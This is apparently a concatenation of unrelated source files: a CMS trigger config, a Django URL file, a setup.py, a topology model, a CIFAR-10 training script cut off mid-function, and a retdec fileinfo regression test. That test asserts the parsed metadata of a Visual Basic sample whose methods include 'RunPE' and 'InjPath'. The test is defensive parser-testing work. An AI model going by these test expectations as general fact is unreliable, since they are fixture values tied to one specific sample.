# t |calo1 (ieg) |calo2 (eg) |calo3 (jet) |calo4 (fwdjet) |calo5 (tau) |calo6 (esums) |calo7 (hfbc/etsums)|calo8 (free) |calo9 (totem) |calo10 (free) |MQF4 |MQF3 |MQB2 |MQB1 |MQF8 |MQF7 |MQB6 |MQB5 |MQF12 |MQF11 |MQB10 |MQB9 |RPC forward |CSC |DT |RPC barrel |muon (sorted four) |algo |algo |techtrigger | |
# | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 |45M 45Q 6M 6Q |45M 45Q 6M 6Q |01M 01Q 23M 23Q |01M 01Q 23M 23Q |45M 45Q 6M 6Q |45M 45Q 6M 6Q |01M 01Q 23M 23Q |01M 01Q 23M 23Q |45M 45Q 6M 6Q |45M 45Q 6M 6Q |01M 01Q 23M 23Q |01M 01Q 23M 23Q | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 | 1 2 3 4 |191--160 159--128 127---96|95----64 63----32 31-----0|15-0 47-32 31-16 63-48| |
# | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
# columns: | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |
# 0 | 1 2 3 4 | 5 6 7 8 | 9 10 11 12 | 13 14 15 16 | 17 18 19 20 | 21 22 23 24 | 25 26 27 28 | 29 30 31 32 | 33 34 35 36 | 37 38 39 40 | 41 42 43 44 | 45 46 47 48 | 49 50 51 52 | 53 54 55 56 | 57 58 59 60 | 61 62 63 64 | 65 66 67 68 | 69 70 71 72 | 73 74 75 76 | 77 78 79 80 | 81 82 83 84 | 85 86 87 88 | 89 90 91 92 | 93 94 95 96 | 97 98 99 100 | 101 102 103 104 | 105 106 107 108 | 109 110 111 | 112 113 114 | 115 116 117 118|119 |
"""),
# footer
PatternFileFooter = cms.string(""),
# A vector of column names to be written for each pattern file line
PatternFileColumns = cms.vstring(),
# A vector of the lengths (in bits!) of each column
PatternFileLengths = cms.vuint32(),
# A vector of default values for each column
PatternFileDefaultValues = cms.vuint32(),
# By default, do not add comments with detailed information
DebugOutput = cms.bool(False)
)
def addBlock(analyzer, name, count, length, default):
for i in range(1,count+1):
analyzer.PatternFileColumns.append("%s%d" % (name, i))
analyzer.PatternFileLengths.append(length)
analyzer.PatternFileDefaultValues.append(default)
def addPSB(analyzer, name):
addBlock(analyzer, name, 4, 16, 0)
def addRegionalMuons(analyzer, name):
# regional muons are different - they need to have a default of 0x0000ff00 when
# empty to make input cable disconnects recognizable
addBlock(analyzer, name, 4, 32, 0x0000ff00)
def addGMTMuons(analyzer, name):
addBlock(analyzer, name, 4, 26, 0)
# set up format:
fields = l1GtPatternGenerator.PatternFileColumns
lengths = l1GtPatternGenerator.PatternFileLengths
defaults = l1GtPatternGenerator.PatternFileDefaultValues
# column 1..20: some fairly standard PSBs (calo1 - calo5)
for name in [ "gctIsoEm", "gctEm", "cenJet", "forJet", "tauJet" ]:
addPSB(l1GtPatternGenerator, name)
# then the energy sums, which are slightly more complicated
# (calo6)
fields += ["etTotal1", "etMiss1", "etHad1", "etMissPhi1"]
lengths += [ 16, 16, 16, 16]
defaults += [ 0, 0, 0, 0]
# HF bit counts / etsums (which are mangled in the C++ code)
# (calo7)
fields += [ "hfPsbValue1_l", "htMiss1", "hfPsbValue1_h", "unknown"]
lengths += [ 16, 16, 16, 16]
defaults += [ 0, 0, 0, 0]
# calo8 - free
addPSB(l1GtPatternGenerator, "unknown")
# calo9 - "totem", currently
addPSB(l1GtPatternGenerator, "unknown")
# calo 10
# BPTX/Castor and TBD data - default to 0xffff to get BPTX triggers matching GT emulator
addBlock(l1GtPatternGenerator, "unknown", 4, 16, 0xffff)
# 12 more PSBs we don't fill
for i in range(12):
addPSB(l1GtPatternGenerator, "unknown")
# regional muons
addRegionalMuons(l1GtPatternGenerator, "fwdMuon")
addRegionalMuons(l1GtPatternGenerator, "cscMuon")
addRegionalMuons(l1GtPatternGenerator, "dtMuon")
addRegionalMuons(l1GtPatternGenerator, "brlMuon")
# global muons
addGMTMuons(l1GtPatternGenerator, "gmtMuon")
# GT stuff
addBlock(l1GtPatternGenerator, "gtDecisionExt", 2, 32, 0)
addBlock(l1GtPatternGenerator, "gtDecision", 4, 32, 0)
# tech triggers: a bit complicated, since we like to mix up
# half-words (see header)
fields += ["gtTechTrigger1_l", "gtTechTrigger2_l", "gtTechTrigger1_h", "gtTechTrigger2_h"]
lengths += [ 16, 16, 16, 16]
defaults += [ 0, 0, 0, 0]
fields += ["gtFinalOr"]
lengths += [ 9]
defaults += [ 0]
# just to make sure the python magic adds up to the proper output format
if len(fields) != 119:
raise ValueError("Expecting 119 data fields (120 - event number) in pattern file format, got %d!" % len(fields) )
# For debugging: Get an overview of your pattern file format
#print fields
#print lengths
#print defaults
| 2.03125 | 2 |
bookmanager/book/urls.py | yangyi-d/django_base | 0 | 12760977 | <filename>bookmanager/book/urls.py<gh_stars>0
from django.urls import path
from book import views
from django.urls.converters import register_converter
# 自定义转换器
# 1.定义转换器
class MobileConverter:
regex = '1[3-9]\d{9}'
# 验证没有问题的数据交给视图函数
def to_python(self, value):
return value
# def to_url(self, value):
# 将匹配结果用于反向解析传值时使用
# return str(value)
# 2.注册转换器,使用register_converter注册
# register_converter(converter, type_name)
# converter 转换器类
# type_name 转换器名称
register_converter(MobileConverter, 'phone')
urlpatterns = [
# path('admin/', admin.site.urls),
path('', views.index),
# 获取url的路径参数
# http://127.0.0.1:8000/index/456/987/
# 获取到city_id 456 shop_id 987
# 通过转换器实现对数据类型的匹配
# 可以使用自定义的转换器实现自己的匹配需求,比如匹配手机号码
# 使用自定义的转换器识别手机号码
path('<int:city_id>/<phone:shop_id>/', views.shop),
# 获取post请求的参数
path('regist/', views.regist),
# 获取json数据
path('jsondata/', views.json_data),
# 返回JSON数据
path('jsonresponsedata/', views.return_json),
# 设置cookies获取cookies
path('set_cookies/', views.set_cookies),
path('get_cookies/', views.get_cookies),
# 设置session获取验证session
path('set_session/', views.set_session),
path('get_session/', views.get_session),
# 使用类视图,同时处理request与post请求
# 使用as_view函数,返回view函数对象
# 使用类视图需要使用类名称.as_view()函数
path('login/', views.LoginView.as_view())
]
| 2.359375 | 2 |
setup.py | AcheqRhermini/submodule-graph | 0 | 12760978 | import setuptools
def install_requires():
return ['click', 'pydot', 'configparser']
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="submodulegraph",
version="1.0.0",
author="<NAME>",
author_email="<EMAIL>",
py_modules=['submodulegraph'],
description="Visualize Git Submodule Graphs",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/bacox/submodule-graph",
install_requires=install_requires(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
entry_points="""
[console_scripts]
submodulegraph=submodulegraph:main
""",
)
| 1.640625 | 2 |
code/analysis/gather_annotation_statistics.py | MichSchli/GCNQA | 2 | 12760979 | <reponame>MichSchli/GCNQA<filename>code/analysis/gather_annotation_statistics.py
import argparse
import operator
import random
from operator import itemgetter
parser = argparse.ArgumentParser(description='Make sure models cannot cheat regardless of implementation bugs.')
parser.add_argument('--annotation_file')
args = parser.parse_args()
type_dict = {}
type_next = False
for line in open(args.annotation_file, 'r'):
line = line.strip()
if line == "Error type:":
type_next = True
elif type_next:
type_next = False
listed_types = line.split("|")
for listed_type in listed_types:
if listed_type not in type_dict:
type_dict[listed_type] = 1
else:
type_dict[listed_type] += 1
sorted_dict = reversed(sorted(type_dict.items(), key=operator.itemgetter(1)))
for type, count in sorted_dict:
spacing = " " * (60 - len(type))
print(type + spacing + str(count)) | 2.703125 | 3 |
topology.py | NanoMembers/DeepFlow | 3 | 12760980 | import util
import sys as _sys
class Topology:
def __init__(self, exp_config):
#System parameters
self.par2Dev = exp_config.system_config.device_placement.par2Dev
self.num_wafers = exp_config.system_config.num_wafers
self.num_nodes_per_wafer= exp_config.system_config.num_nodes_per_wafer
self.tot_nodes = exp_config.system_config.tot_nodes
self.adj = [[0 for x in range(self.tot_nodes)] for x in range(self.tot_nodes)]
#Parallelization Params
self.lp_dim = exp_config.sch_config.lp
self.dp_dim = exp_config.sch_config.dp
h1 = exp_config.sch_config.kp_hidden_dim1
s1 = exp_config.sch_config.kp_softmax_dim1
e1 = exp_config.sch_config.kp_embedding_dim1
p1 = exp_config.sch_config.kp_projection_dim1
h2 = exp_config.sch_config.kp_hidden_dim2
s2 = exp_config.sch_config.kp_softmax_dim2
e2 = exp_config.sch_config.kp_embedding_dim2
p2 = exp_config.sch_config.kp_projection_dim2
self.kp_dim = max(h1 * h2, s1 * s2, p1 * p2, e1 * e2)
#Verify system_hierarchy configuration is valid
try:
self.sanityCheckSysHierarchy()
except Exception as e:
print("Unexpected error occurred during sanity check of system hierarchy:\n"
"{}".format(e), flush=True)
_sys.exit(0)
#Network parameters
self.data_intra = True;
self.kernel_intra = True;
self.layer_intra = True;
self.mem_frac = exp_config.perimeter_breakdown.DRAM
self.inter_frac = exp_config.perimeter_breakdown.inter_node
self.intra_frac = exp_config.perimeter_breakdown.intra_node
self.createAdjacancyMatrix(kp = self.kp_dim, lp = self.lp_dim, dp = self.dp_dim);
self.interNodeDegree, self.intraNodeDegree = self.findMaxDegree()
self.intra_par = True if self.intraNodeDegree > 0 else False
self.inter_par = True if self.interNodeDegree > 0 else False
def sanityCheckSysHierarchy(self):
assert (self.tot_nodes == self.dp_dim * self.kp_dim * self.lp_dim), "tot_nodes != dp * kp * lp"
for key, val in self.par2Dev.items():
wafer_id, node_id = val
dp, lp, kp = key
#assert (dp < self.dp_dim), "data shard index out of bound"
assert (dp < self.dp_dim), "@wafer {}, node {}, data shard index ({}) >= data parallel shards ({})".format(wafer_id, node_id, dp, self.dp_dim)
assert (kp < self.kp_dim), "@wafer {}, node {}, kernel shard index ({}) >= kernel parallel shards ({})".format(wafer_id, node_id, kp, self.kp_dim)
assert (lp < self.lp_dim), "@wafer {}, node {}, layer shard index ({}) >= layer parallel shards ({})".format(wafer_id, node_id, lp, self.lp_dim)
def node_id(self, point):
wafer_id, node_id = point
return wafer_id * self.num_nodes_per_wafer + node_id
    def createAdjacancyMatrix(self, kp, lp, dp):
        """Populate self.adj with the communication links implied by the
        kernel/layer/data parallelism dimensions.

        Entry values:
        #0 not connected
        #1 connected internally
        #2 connected externally

        Side effects: clears self.kernel_intra / self.layer_intra /
        self.data_intra to False whenever the corresponding traffic class
        crosses a wafer boundary.
        """
        #connect kernel parallel connections
        #Assumption: reduction is performed through ring-all-reduce algorithm
        for i in range(0, dp):
            for j in range(0, lp):
                for k in range(0, kp):
                    # Ring neighbor: shard k talks to shard (k+1) mod kp
                    start_point = self.par2Dev[(i,j,k)];
                    end_point = self.par2Dev[(i,j,(k+1) % kp)];
                    start_point_id = self.node_id(start_point);
                    end_point_id = self.node_id(end_point);
                    if start_point_id != end_point_id:
                        start_point_wafer_id,_ = start_point
                        end_point_wafer_id,_ = end_point
                        self.adj[start_point_id][end_point_id] = \
                            (1 if (start_point_wafer_id == end_point_wafer_id) else 2)
                        if start_point_wafer_id != end_point_wafer_id:
                            self.kernel_intra = False;
        #connect layer parallel connections
        #Assumption: across layers, for a given data shard, each kernel shard
        #need to have connections to all kernel shards in previous layers.
        #FIXME: This can be an overkill depending on the type of kernel parallelism.
        for i in range(0, dp):
            for j in reversed(range(1, lp)):
                for k in range(0, kp):
                    end_point = self.par2Dev[(i,j,k)];
                    # All-to-all between layer j-1 and layer j kernel shards
                    for m in range(0, kp):
                        start_point = self.par2Dev[(i,j-1,m)];
                        start_point_id = self.node_id(start_point);
                        end_point_id = self.node_id(end_point);
                        if start_point_id != end_point_id:
                            start_point_wafer_id,_ = start_point
                            end_point_wafer_id,_ = end_point
                            self.adj[start_point_id][end_point_id] = \
                                (1 if (start_point_wafer_id == end_point_wafer_id) else 2)
                            if start_point_wafer_id != end_point_wafer_id:
                                self.layer_intra = False;
        #connect data parallel connections
        #Assumption: within a layer, each parallel kernel can be reduced
        for j in range(0, lp):
            for k in range(0, kp):
                for i in range(0, dp):
                    # Ring over data shards: i talks to (i+1) mod dp
                    start_point = self.par2Dev[(i,j,k)];
                    end_point = self.par2Dev[((i + 1) % dp,j,k)];
                    start_point_id = self.node_id(start_point);
                    end_point_id = self.node_id(end_point);
                    if start_point_id != end_point_id:
                        start_point_wafer_id,_ = start_point
                        end_point_wafer_id,_ = end_point
                        self.adj[start_point_id][end_point_id] = \
                            (1 if (start_point_wafer_id == end_point_wafer_id) else 2)
                        if start_point_wafer_id != end_point_wafer_id:
                            self.data_intra = False;
    #Across all wafers, across all nodes, find maximum inter and intra node degree
    def findMaxDegree(self):
        """Return (max inter-node degree, max intra-node degree) over all nodes.

        Scans every row of the adjacency matrix built by createAdjacancyMatrix:
        value 1 counts toward the intra-wafer degree, value 2 toward the
        inter-wafer degree.
        """
        max_interNodeDegree = 0
        max_intraNodeDegree = 0
        for wid in range(0, self.num_wafers):
            for cid in range(0, self.num_nodes_per_wafer):
                nid = self.node_id((wid,cid));
                interNodeDegree = 0
                intraNodeDegree = 0
                for i in range(0, self.tot_nodes):
                    if (self.adj[nid][i] == 1):
                        intraNodeDegree = intraNodeDegree + 1
                    elif (self.adj[nid][i] == 2):
                        interNodeDegree = interNodeDegree + 1
                if (interNodeDegree > max_interNodeDegree):
                    max_interNodeDegree = interNodeDegree
                if (intraNodeDegree > max_intraNodeDegree):
                    max_intraNodeDegree = intraNodeDegree
        return max_interNodeDegree, max_intraNodeDegree
    def get_fractions(self):
        """Return (inter_frac, intra_frac) perimeter fractions set in __init__."""
        return self.inter_frac, self.intra_frac
    #get P2P bandwidth between data shards
    def getDataThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
        """Return (bandwidth, latency) for data-parallel traffic.

        Uses the intra-wafer figures only when every data-parallel link stayed
        on a single wafer (data_intra set by createAdjacancyMatrix).
        """
        return ((intra_bw, intra_lat) if self.data_intra
                else (inter_bw, inter_lat))
    #get P2P bandwidth between kernel shards
    def getKernelThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
        """Return (bandwidth, latency) for kernel-parallel traffic (see above)."""
        return ((intra_bw, intra_lat) if self.kernel_intra
                else (inter_bw, inter_lat))
    #get P2P bandwidth between layer shards
    def getLayerThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
        """Return (bandwidth, latency) for layer-parallel traffic (see above)."""
        return ((intra_bw, intra_lat) if self.layer_intra
                else (inter_bw, inter_lat))
| 2.375 | 2 |
tools/fileinfo/features/visual-basic-parser/test.py | stepanek-m/retdec-regression-tests | 0 | 12760981 | from regression_tests import *
# https://github.com/avast-tl/retdec/issues/138
# Test for proper Visual Basic metadata parsing
class Test1(Test):
    """Checks Visual Basic p-code metadata extracted by fileinfo from a known
    sample (project/TypeLib info, extern table, object table)."""
    settings = TestSettings(
        tool='fileinfo',
        input='3e7126c600eb3d73c9b470aa98f2a416',
        args='--verbose --json'
    )

    def test_visual_basic_presented(self):
        # Top-level VB project and TypeLib metadata.
        assert self.fileinfo.succeeded
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['backupLanguageDLL'], '*')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['isPCode'], 'yes')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['languageDLL'], 'VB6DE.DLL')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['languageDLLPrimaryLCID'], 'German - Germany')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['languageDLLSecondaryLCID'], 'English - United States')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectDescription'], 'Projekt1')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectExeName'], 'my_st0re_loader_____')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectName'], 'muschmusch')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectPath'], 'C:\\Users\\Tix\\Desktop\\Sell_Tools\\iProtect\\load\\asdasd.vbp')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectPrimaryLCID'], 'English - United States')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['projectSecondaryLCID'], 'German - Austria')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['typeLibCLSID'], 'AB656C18-7E7D-2A48-90D0-CC26EBE49DE4')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['typeLibLCID'], 'Unspecified')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['typeLibMajorVersion'], '1')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['typeLibMinorVersion'], '0')

    def test_visual_basic_extern_table(self):
        # Extern table hashes plus each (module, API) import pair.
        assert self.fileinfo.succeeded
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['crc32'], '4647fd66')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['md5'], '038528f5da1ca95d66de9ffb558a8fad')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['sha256'], '8903e14d38862749270803180fc2240bce4610e28b2e4f4bfdaec55a6cfaa3ff')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][0]['apiName'], 'ARgopzWRvwdj')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][0]['moduleName'], 'netapi32')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][1]['apiName'], 'PYZXczGNsFE')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][1]['moduleName'], 'netapi32')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][2]['apiName'], 'HMxqxbooEHKCbqjT')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][2]['moduleName'], 'mapi32')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][3]['apiName'], 'eiIwtnFCZvUZW')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][3]['moduleName'], 'mapi32')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][4]['apiName'], 'CallWindowProcW')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][4]['moduleName'], 'UsEr32')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][5]['apiName'], 'pNfrfdXpmJsDJFRi')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][5]['moduleName'], 'netapi32')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][6]['apiName'], 'KnSCymHxoCMv')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][6]['moduleName'], 'netapi32')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][7]['apiName'], 'zVWgpkOdwQje')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][7]['moduleName'], 'shell32')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][8]['apiName'], 'ylMihJrIuyYyKDWTq')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][8]['moduleName'], 'version.dll')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][9]['apiName'], 'BegNhmukPYZXczGN')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['externTable']['externs'][9]['moduleName'], 'mapi32')

    def test_visual_basic_object_table(self):
        # Object table GUID, hashes, and per-object method names.
        assert self.fileinfo.succeeded
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['guid'], '005CD394-A073-944E-8831-0A6EFC7D3AF0')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['crc32'], '0b86b7f1')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['md5'], 'f6c85535feafadb74306afc874c516a0')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['sha256'], 'ae05250c967d1f55105322454ada56db6990bd74a41a2cc63ce4e2f458a85616')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['name'], 'acnaAA')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][0], 'RunPE')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][1], 'Invoke')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][2], 'sDecryptName')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][3], 'InjPath')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][4], 'nand')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['objectTable']['objects'][0]['methods'][5], 'xori')
# Test for proper COM Visual Basic metadata parsing
class Test2(Test):
    """Checks COM registration metadata (CLSIDs, object name and type)."""
    settings = TestSettings(
        tool='fileinfo',
        input='c4affaea94863009d90668c9d86291864cd6027d798a20085b5110f6473450b7',
        args='--verbose --json'
    )

    def test_visual_basic_com_data_presented(self):
        assert self.fileinfo.succeeded
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectCLSID'], '13A84C25-CDF1-F24D-9338-CEF08CAAF469')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectEventsCLSID'], '3490B97E-F7E7-8847-8A6F-97AB39FC9C97')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectInterfaceCLSID'], '1A2ADBEC-0944-C944-A046-F535D14B4E10')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectName'], 'usrReverseRelay')
        self.assertEqual(self.fileinfo.output['visualBasicInfo']['comObjectType'], 'ActiveXUserControl')
| 2.1875 | 2 |
scripts/plain_models/cifar_resnet/train_pytorch.py | microsoft/archai | 344 | 12760982 | <reponame>microsoft/archai
import argparse
import math
from typing import List, Mapping, Optional, Tuple, Any
import os
import logging
import numpy as np
import time
import torch
from torch import nn
from torch.optim.optimizer import Optimizer
from torch.optim.lr_scheduler import _LRScheduler
from torch.nn.modules.loss import _Loss
from torch.utils.data import DataLoader
import torchvision
import torchvision.transforms as transforms
import yaml
from archai.common import utils
from archai import cifar10_models
def train(epochs, train_dl, val_dal, net, device, crit, optim,
          sched, sched_on_epoch, half, quiet, grad_clip:float) -> List[Mapping]:
    """Train `net` for `epochs` epochs, validating after each when a val loader exists.

    Returns a list of per-epoch metric dicts with keys:
    val_top1, train_top1, lr, epoch, train_loss.
    """
    # FIX: removed dead initializers `train_acc, test_acc = 0.0, 0.0` —
    # test_acc was never used and train_acc was overwritten before any read.
    metrics = []
    for epoch in range(epochs):
        lr = optim.param_groups[0]['lr']  # record LR before the scheduler steps
        train_acc, loss = train_epoch(epoch, net, train_dl, device, crit, optim,
                                      sched, sched_on_epoch, half, grad_clip)
        # NaN marks "no validation set" in the metrics rather than 0.0
        val_acc = test(net, val_dal, device,
                       half) if val_dal is not None else math.nan
        metrics.append({'val_top1': val_acc, 'train_top1': train_acc, 'lr': lr,
                        'epoch': epoch, 'train_loss': loss})
        if not quiet:
            logging.info(f'train_epoch={epoch}, val_top1={val_acc},'
                         f' train_top1={train_acc}, lr={lr:.4g}')
    return metrics
def optim_sched_orig(net, epochs):
    """Build SGD + the original ResNet-paper step-decay schedule.

    `epochs` is accepted for signature parity with optim_sched_cosine; the
    milestone list itself is fixed.
    """
    lr = 0.1
    momentum = 0.9
    weight_decay = 1.0e-4
    optim = torch.optim.SGD(net.parameters(),
                            lr, momentum=momentum, weight_decay=weight_decay)
    logging.info(f'lr={lr}, momentum={momentum}, weight_decay={weight_decay}')

    # Step decay at the milestones used in the original ResNet paper.
    milestones = [100, 150, 200, 400, 600]
    sched = torch.optim.lr_scheduler.MultiStepLR(optim, milestones=milestones)
    sched_on_epoch = True

    logging.info(f'sched_on_epoch={sched_on_epoch}, sched={str(sched)}')
    return optim, sched, sched_on_epoch
def optim_sched_cosine(net, epochs):
    """Build SGD + a cosine-annealing LR schedule spanning `epochs` epochs."""
    base_lr, sgd_momentum, wd = 0.025, 0.9, 1.0e-4
    optim = torch.optim.SGD(net.parameters(),
                            base_lr, momentum=sgd_momentum, weight_decay=wd)
    logging.info(f'lr={base_lr}, momentum={sgd_momentum}, weight_decay={wd}')

    # Anneal LR from base_lr toward 0 along a cosine curve, once per epoch.
    sched = torch.optim.lr_scheduler.CosineAnnealingLR(optim, epochs)
    sched_on_epoch = True

    logging.info(f'sched_on_epoch={sched_on_epoch}, sched={str(sched)}')
    return optim, sched, sched_on_epoch
def get_data(datadir: str, train_batch_size=128, test_batch_size=4096,
             cutout=0, train_num_workers=-1, test_num_workers=-1,
             val_percent=10.0)\
        -> Tuple[DataLoader, Optional[DataLoader], DataLoader]:
    """Create CIFAR-10 train/val/test DataLoaders.

    `val_percent` of the training set is split off for validation; the val
    loader is None when the split is empty. A worker count of -1 means
    auto-select (4 workers per visible GPU, 0 when under a debugger).
    Downloads the dataset into `datadir` if missing.
    """
    if utils.is_debugging():
        train_num_workers = test_num_workers = 0
        logging.info('debugger=true, num_workers=0')
    if train_num_workers <= -1:
        train_num_workers = torch.cuda.device_count()*4
    if test_num_workers <= -1:
        test_num_workers = torch.cuda.device_count()*4
    # Augmentation only on the training split.
    train_transform = cifar10_transform(aug=True, cutout=cutout)
    trainset = torchvision.datasets.CIFAR10(root=datadir, train=True,
                                            download=True, transform=train_transform)
    val_len = int(len(trainset) * val_percent / 100.0)
    train_len = len(trainset) - val_len
    valset = None
    if val_len:
        trainset, valset = torch.utils.data.random_split(
            trainset, [train_len, val_len])
    train_dl = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size,
                                           shuffle=True, num_workers=train_num_workers, pin_memory=True)
    if valset is not None:
        # Validation uses the (larger) test batch size — no gradients are kept.
        val_dl = torch.utils.data.DataLoader(valset, batch_size=test_batch_size,
                                             shuffle=False, num_workers=test_num_workers, pin_memory=True)
    else:
        val_dl = None
    test_transform = cifar10_transform(aug=False, cutout=0)
    testset = torchvision.datasets.CIFAR10(root=datadir, train=False,
                                           download=True, transform=test_transform)
    test_dl = torch.utils.data.DataLoader(testset, batch_size=test_batch_size,
                                          shuffle=False, num_workers=test_num_workers, pin_memory=True)
    logging.info(
        f'train_len={train_len}, val_len={val_len}, test_len={len(testset)}')
    return train_dl, val_dl, test_dl
def train_epoch(epoch, net, train_dl, device, crit, optim,
                sched, sched_on_epoch, half, grad_clip:float) -> Tuple[float, float]:
    """Run one training pass over `train_dl`.

    Returns (top-1 accuracy in percent, summed batch loss).
    """
    num_correct = 0
    num_seen = 0
    loss_sum = 0.0
    net.train()
    for inputs, targets in train_dl:
        inputs = inputs.to(device, non_blocking=True)
        targets = targets.to(device, non_blocking=True)
        if half:
            inputs = inputs.half()

        outputs, loss = train_step(net, crit, optim, sched, sched_on_epoch,
                                   inputs, targets, grad_clip)
        loss_sum += loss

        _, predicted = outputs.max(1)
        num_seen += targets.size(0)
        num_correct += predicted.eq(targets).sum().item()

    # Epoch-granularity schedulers step once, after all batches.
    if sched and sched_on_epoch:
        sched.step()
    return 100.0*num_correct/num_seen, loss_sum
def train_step(net: nn.Module,
               crit: _Loss, optim: Optimizer, sched: _LRScheduler, sched_on_epoch: bool,
               inputs: torch.Tensor, targets: torch.Tensor, grad_clip:float) -> Tuple[torch.Tensor, float]:
    """Run a single forward/backward/optimizer step.

    Returns (raw network outputs, scalar loss value).
    """
    logits = net(inputs)
    batch_loss = crit(logits, targets)

    optim.zero_grad()
    batch_loss.backward()
    # Clip the global gradient norm to keep updates bounded.
    nn.utils.clip_grad_norm_(net.parameters(), grad_clip)
    optim.step()

    # Batch-granularity schedulers step after every optimizer update.
    if sched and not sched_on_epoch:
        sched.step()
    return logits, batch_loss.item()
def test(net, test_dl, device, half) -> float:
    """Evaluate `net` on `test_dl`; returns top-1 accuracy in percent."""
    hits, seen = 0, 0
    net.eval()
    with torch.no_grad():
        for inputs, targets in test_dl:
            inputs = inputs.to(device, non_blocking=False)
            targets = targets.to(device)
            if half:
                inputs = inputs.half()

            # .max(1) yields (values, indices); index 1 are predicted classes.
            predicted = net(inputs).max(1)[1]
            seen += targets.size(0)
            hits += predicted.eq(targets).sum().item()
    return 100.0*hits/seen
def param_size(model: torch.nn.Module) -> int:
    """count all parameters excluding auxiliary"""
    total = 0
    for name, tensor in model.named_parameters():
        if "auxiliary" in name:
            continue  # auxiliary-head weights are not counted
        total += tensor.numel()
    return total
def cifar10_transform(aug: bool, cutout=0):
    """Build the CIFAR-10 preprocessing pipeline.

    Always converts to tensor and normalizes with CIFAR-10 channel statistics.
    When `aug` is True, prepends random crop + horizontal flip; when
    `cutout` > 0, appends CutoutDefault (which must follow normalization).
    """
    MEAN = [0.49139968, 0.48215827, 0.44653124]
    STD = [0.24703233, 0.24348505, 0.26158768]
    transf = [
        transforms.ToTensor(),
        transforms.Normalize(MEAN, STD)
    ]
    if aug:
        aug_transf = [
            transforms.RandomCrop(32, padding=4),
            transforms.RandomHorizontalFlip()
        ]
        transf = aug_transf + transf
    if cutout > 0:  # must be after normalization
        transf += [CutoutDefault(cutout)]
    return transforms.Compose(transf)
class CutoutDefault:
    """
    Zero out one randomly-placed `length` x `length` square of the image
    (in place), as in the Cutout augmentation.
    Reference : https://github.com/quark0/darts/blob/master/cnn/utils.py
    """
    def __init__(self, length):
        self.length = length

    def __call__(self, img):
        h, w = img.size(1), img.size(2)
        half = self.length // 2
        # Pick a random patch center, then clamp the square to image bounds.
        cy = np.random.randint(h)
        cx = np.random.randint(w)
